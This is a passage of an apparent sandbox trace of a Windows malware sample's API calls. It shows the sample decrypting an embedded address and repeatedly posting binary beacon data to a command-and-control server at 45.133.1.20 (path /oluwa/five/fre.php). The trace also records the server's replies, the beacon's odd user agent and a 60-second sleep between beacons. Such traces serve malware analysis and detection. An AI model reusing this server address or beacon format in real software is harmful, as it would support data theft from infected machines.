0x6a0000 [0175.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0175.329] GetProcessHeap () returned 0x6a0000 [0175.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0175.330] closesocket (s=0x388) returned 0 [0175.330] GetProcessHeap () returned 0x6a0000 [0175.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0175.331] GetProcessHeap () returned 0x6a0000 [0175.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.331] GetProcessHeap () returned 0x6a0000 [0175.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0175.332] GetProcessHeap () returned 0x6a0000 [0175.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0175.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xed4) returned 0x388 [0175.334] Sleep (dwMilliseconds=0xea60) [0175.336] GetProcessHeap () returned 0x6a0000 [0175.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0175.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.337] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.344] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0175.370] GetProcessHeap () returned 0x6a0000 [0175.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0175.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.385] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0175.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.386] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.387] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.387] GetProcessHeap () returned 0x6a0000 [0175.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0175.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.390] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0175.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.391] CryptDestroyKey (hKey=0x6ad560) returned 1 [0175.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.392] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0175.392] GetProcessHeap () returned 0x6a0000 [0175.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.393] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0175.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.395] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0175.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.396] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0175.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.397] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0175.397] GetProcessHeap () returned 0x6a0000 [0175.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0175.398] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0175.398] GetProcessHeap () returned 0x6a0000 [0175.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0175.398] GetProcessHeap () returned 0x6a0000 [0175.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.399] GetProcessHeap () returned 0x6a0000 [0175.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0175.399] GetProcessHeap () returned 0x6a0000 [0175.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0175.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.401] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.411] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0175.420] GetProcessHeap () returned 0x6a0000 [0175.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0175.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.421] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0175.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.422] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.423] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.423] GetProcessHeap () returned 0x6a0000 [0175.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0175.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.424] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0175.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.425] CryptDestroyKey (hKey=0x6ad020) returned 1 [0175.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.426] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0175.426] GetProcessHeap () returned 0x6a0000 [0175.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.427] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0175.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.428] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0175.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.429] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0175.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.430] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0175.430] GetProcessHeap () returned 0x6a0000 [0175.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0175.430] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf3a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0175.430] GetProcessHeap () returned 0x6a0000 [0175.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0175.430] socket (af=2, type=1, protocol=6) returned 0x38c [0175.431] connect (s=0x38c, name=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0175.460] FreeAddrInfoW (pAddrInfo=0x6bf3a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0175.460] GetProcessHeap () returned 0x6a0000 [0175.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0175.460] GetProcessHeap () returned 0x6a0000 [0175.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0175.460] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.461] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0175.461] GetProcessHeap () returned 0x6a0000 [0175.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0175.461] GetProcessHeap () returned 0x6a0000 [0175.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.462] GetProcessHeap () returned 0x6a0000 [0175.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0175.462] GetProcessHeap () returned 0x6a0000 [0175.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0175.463] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.464] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0175.464] GetProcessHeap () returned 0x6a0000 [0175.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0175.464] GetProcessHeap () returned 0x6a0000 [0175.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.464] send (s=0x38c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0175.465] send (s=0x38c, buf=0x6bb998*, len=159, flags=0) returned 159 [0175.465] GetProcessHeap () returned 0x6a0000 [0175.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0175.465] recv (in: s=0x38c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0175.537] GetProcessHeap () returned 0x6a0000 [0175.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0175.537] GetProcessHeap () returned 0x6a0000 [0175.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0175.538] GetProcessHeap () returned 0x6a0000 [0175.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0175.538] GetProcessHeap () returned 0x6a0000 [0175.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0175.540] closesocket (s=0x38c) returned 0 [0175.540] GetProcessHeap () returned 0x6a0000 [0175.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0175.540] GetProcessHeap () returned 0x6a0000 [0175.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.541] GetProcessHeap () returned 0x6a0000 [0175.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0175.541] GetProcessHeap () returned 0x6a0000 [0175.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0175.542] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xed8) returned 0x38c [0175.544] Sleep (dwMilliseconds=0xea60) [0175.546] GetProcessHeap () returned 0x6a0000 [0175.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0175.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.564] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0175.572] GetProcessHeap () returned 0x6a0000 [0175.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b67b8 [0175.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.575] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b67b8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0175.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.577] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.578] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.579] GetProcessHeap () returned 0x6a0000 [0175.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b67b8 | out: hHeap=0x6a0000) returned 1 [0175.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.587] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0175.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.588] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0175.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.589] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0175.589] GetProcessHeap () returned 0x6a0000 [0175.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.590] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0175.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.591] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0175.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.592] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0175.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.593] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0175.593] GetProcessHeap () returned 0x6a0000 [0175.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0175.593] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0175.593] GetProcessHeap () returned 0x6a0000 [0175.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0175.594] GetProcessHeap () returned 0x6a0000 [0175.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.596] GetProcessHeap () returned 0x6a0000 [0175.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0175.596] GetProcessHeap () returned 0x6a0000 [0175.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0175.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.604] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0175.612] GetProcessHeap () returned 0x6a0000 [0175.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0175.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.613] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0175.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.614] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.615] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.615] GetProcessHeap () returned 0x6a0000 [0175.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0175.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.617] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0175.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.618] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0175.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.619] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0175.619] GetProcessHeap () returned 0x6a0000 [0175.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.620] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0175.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.621] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0175.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.621] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0175.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.623] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0175.623] GetProcessHeap () returned 0x6a0000 [0175.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0175.623] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfa08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0175.624] GetProcessHeap () returned 0x6a0000 [0175.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0175.624] socket (af=2, type=1, protocol=6) returned 0x390 [0175.624] connect (s=0x390, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0175.645] FreeAddrInfoW (pAddrInfo=0x6bfa08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0175.645] GetProcessHeap () returned 0x6a0000 [0175.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0175.645] GetProcessHeap () returned 0x6a0000 [0175.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0175.645] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.646] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0175.646] GetProcessHeap () returned 0x6a0000 [0175.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0175.646] GetProcessHeap () returned 0x6a0000 [0175.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.647] GetProcessHeap () returned 0x6a0000 [0175.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0175.647] GetProcessHeap () returned 0x6a0000 [0175.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0175.648] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.648] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0175.649] GetProcessHeap () returned 0x6a0000 [0175.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0175.649] GetProcessHeap () returned 0x6a0000 [0175.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.649] send (s=0x390, buf=0x6bbd20*, len=242, flags=0) returned 242 [0175.649] send (s=0x390, buf=0x6bb998*, len=159, flags=0) returned 159 [0175.649] GetProcessHeap () returned 0x6a0000 [0175.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0175.650] recv (in: s=0x390, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0175.715] GetProcessHeap () returned 0x6a0000 [0175.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0175.715] GetProcessHeap () returned 0x6a0000 [0175.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0175.717] GetProcessHeap () returned 0x6a0000 [0175.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0175.717] GetProcessHeap () returned 0x6a0000 [0175.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0175.718] closesocket (s=0x390) returned 0 [0175.718] GetProcessHeap () returned 0x6a0000 [0175.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0175.718] GetProcessHeap () returned 0x6a0000 [0175.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.718] GetProcessHeap () returned 0x6a0000 [0175.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0175.719] GetProcessHeap () returned 0x6a0000 